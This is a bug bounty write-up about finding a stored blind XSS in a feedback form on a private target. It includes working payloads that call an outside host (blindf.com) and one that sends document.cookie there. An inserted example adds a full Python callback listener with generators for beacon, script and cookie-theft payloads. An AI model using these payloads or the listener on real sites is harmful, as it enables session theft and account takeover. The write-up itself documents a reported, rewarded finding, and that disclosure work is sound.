N/a to $750 bounty for a Blind XSS.

1 year ago

Without wasting any time, I will keep everything to the point.

It’s a private program, so we call it www.target.com.

Vulnerable form: Feedback form on www.target.com

I use www.blindf.com to receive the callbacks that reveal a blind XSS. You can also use your own VPS to receive them.

My methodology to find the BXSS:

My experience is that the basic BXSS payload

"></script><script src=https://blindf.com/bx.php></script>

often does not fire. Payloads that exfiltrate the DOM or the page source also fail often. So to find a BXSS, I first use a blind HTML payload

"><img src='https://blindf.com/b.php?c=querytoremember'/>

in every text field. The reason for using it is to get past the WAF or any other filtering the developer has put in place: the payload contains no JavaScript code or tags, so it renders without difficulty and sends a request to www.blindf.com wherever the stored input is displayed. Be clear about what that request proves: the markup landed unescaped in some page that somebody opened, not that script runs there. A later script payload can still be stopped by a filter on <script> or by the page's content security policy, so a hit on the HTML beacon is the signal to start testing for BXSS, not the BXSS itself. Once you receive the response, you can go ahead and test for BXSS.
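Below is an added example, not the author's code and not blindf.com's tooling: a minimal self-hosted listener for the "own VPS" option mentioned above, with the three payload stages used in this write-up generated against it (the HTML-only beacon, the external script probe, and the cookie-only img onload probe the author falls back to later in the post). The callback host cb.example.net, the endpoint names /b, /bx.js, /a.jpg and /oc, and the hits.jsonl log file are my own assumptions. The tagging scheme goes a little beyond the single query tag the author uses: one tag per program, form and field, so a hit tells you which field rendered.

```python
"""Two-stage blind XSS callback listener and payload tagger.

Added example. Assumptions not taken from the write-up: the listener runs on
your own VPS behind the hypothetical hostname cb.example.net, hits are appended
to hits.jsonl, and the endpoint names /b, /bx.js, /a.jpg and /oc are ours.
"""
import json
import re
import time
from dataclasses import asdict, dataclass
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Mapping, Optional
from urllib.parse import parse_qs, urlsplit

CALLBACK_HOST = "https://cb.example.net"  # assumption: a host you control

# 1x1 transparent GIF, served for /a.jpg so that <img onload> actually fires:
# onload only runs if the image decodes, so a 404 would silently kill stage 2b.
PIXEL_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
             b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def tag_for(program: str, form: str, field: str) -> str:
    """One tag per program/form/field, so a hit tells you which field rendered."""
    return re.sub(r"[^A-Za-z0-9_]", "_", f"{program}_{form}_{field}")


# Stage 1: HTML-only beacon. No <script>, no event handler, so filters that key
# on JavaScript let it through. A hit proves the markup rendered unescaped
# somewhere, not that script runs there.
def html_beacon(tag: str) -> str:
    return f"\"><img src='{CALLBACK_HOST}/b?c={tag}'/>"


# Stage 2a: external script load (the "basic BXSS payload" in the write-up).
def script_probe(tag: str) -> str:
    return f'"></script><script src={CALLBACK_HOST}/bx.js?c={tag}></script>'


# Stage 2b: minimal inline JS that exfiltrates only document.cookie.
# encodeURIComponent keeps ';' and '=' in the cookie string intact in the query.
def cookie_probe(tag: str) -> str:
    return (f'"><img src={CALLBACK_HOST}/a.jpg '
            f"onload=\"this.src='{CALLBACK_HOST}/oc?c={tag}&k='"
            '+encodeURIComponent(document.cookie)">')


@dataclass
class Hit:
    stage: str       # "html", "script" or "cookie"
    tag: str         # the c= value we planted
    cookie: str      # k= value, only present on cookie-stage hits
    referer: str     # where the payload rendered (often an internal back office)
    user_agent: str
    ts: float


STAGES = {"/b": "html", "/bx.js": "script", "/oc": "cookie"}


def classify_hit(path: str, headers: Mapping[str, str]) -> Optional[Hit]:
    """Map an incoming request to the stage that produced it, or None for noise."""
    parts = urlsplit(path)
    stage = STAGES.get(parts.path)
    if stage is None:
        return None  # scanners, favicon requests, etc.
    q = parse_qs(parts.query)
    return Hit(
        stage=stage,
        tag=q.get("c", [""])[0],
        cookie=q.get("k", [""])[0],
        referer=headers.get("Referer", ""),
        user_agent=headers.get("User-Agent", ""),
        ts=time.time(),
    )


def script_body(tag: str) -> bytes:
    """What /bx.js serves: a second beacon carrying the cookie for this tag."""
    js = ("new Image().src='%s/oc?c=%s&k='+encodeURIComponent(document.cookie);"
          % (CALLBACK_HOST, tag))
    return js.encode()


class Listener(BaseHTTPRequestHandler):
    def do_GET(self):
        hit = classify_hit(self.path, self.headers)
        if hit is not None:
            with open("hits.jsonl", "a") as f:
                f.write(json.dumps(asdict(hit)) + "\n")
        if hit is not None and hit.stage == "script":
            ctype, body = "application/javascript", script_body(hit.tag)
        else:
            ctype, body = "image/gif", PIXEL_GIF  # /a.jpg, /b and /oc are <img> loads
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep stdout quiet; hits.jsonl is the record
        pass


if __name__ == "__main__":
    t = tag_for("target.com", "feedback", "message")
    for p in (html_beacon(t), script_probe(t), cookie_probe(t)):
        print(p)
    HTTPServer(("0.0.0.0", 8080), Listener).serve_forever()  # put TLS in front
```

The Referer on a hit is usually the most useful field: it names the back-office page where the stored feedback was rendered, and together with the per-field tag it is what a triager needs to reproduce the finding. Two practical caveats the write-up's payloads depend on: img onload only fires if the image actually decodes, so the callback host must serve a real image on that path, and the callbacks should be served over HTTPS, because a modern browser will block or upgrade a plain-http image load from an https page and the beacon never arrives.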

How I found this bug:

I used the BHTML payload

"><img src='https://blindf.com/b.php?c=querytoremember'>

in every text field of the feedback form at www.target.com/feedback.

After a few days, www.blindf.com received a request triggered by the payload from the vulnerable target. I then went ahead and submitted the basic BXSS payload

"></script><script src=https://blindf.com/bx.php></script>

to find the BXSS, because at this point I knew the form was vulnerable.

I waited 20 days but did not receive a response. Then I tried a trick. I submitted the blind HTML payload

"><img src='https://blindf.com/b.php?c=target_com_latestpayload'>

and then resubmitted the form with my basic BXSS payload. That is, I submitted the form twice: the first time with the BHTML payload and the second time with the BXSS payload.

After some time I received a response from my BHTML payload, but the BXSS payload sent nothing. I understood that my BXSS payload had failed and would not send any response now, because both payloads were submitted on the same day and should have fired at the same time. www.blindf.com also provides other payloads with minimal JS execution. I used a different payload that only extracts cookies and no DOM values from the page.

Payload:

"><img src=https://blindf.com/a.jpg onload=this.src='https://test.blindf.com/oc.php/?c='+document.cookie>

This payload executed and I received the cookie.

Bug submitted.

The triager tried to reproduce the bug but failed, so he closed it as N/A.

I raised the issue. Another triager used a well-known blind XSS hunting website but did not receive any response. Closed as N/A again.

I raised the issue again and gave him my www.blindf.com account credentials so he could reproduce the bug. I asked him to fill out the form twice, the first time with the BHTML payload and the second time with the BXSS (cookie extraction) payload. Both payloads executed and www.blindf.com received the response from each.

Triaged.

Bounty received: $750.

So, after my bug was closed as N/A twice, I finally received the bounty.

Thank you for reading my boring stuff and tolerating my bad English.
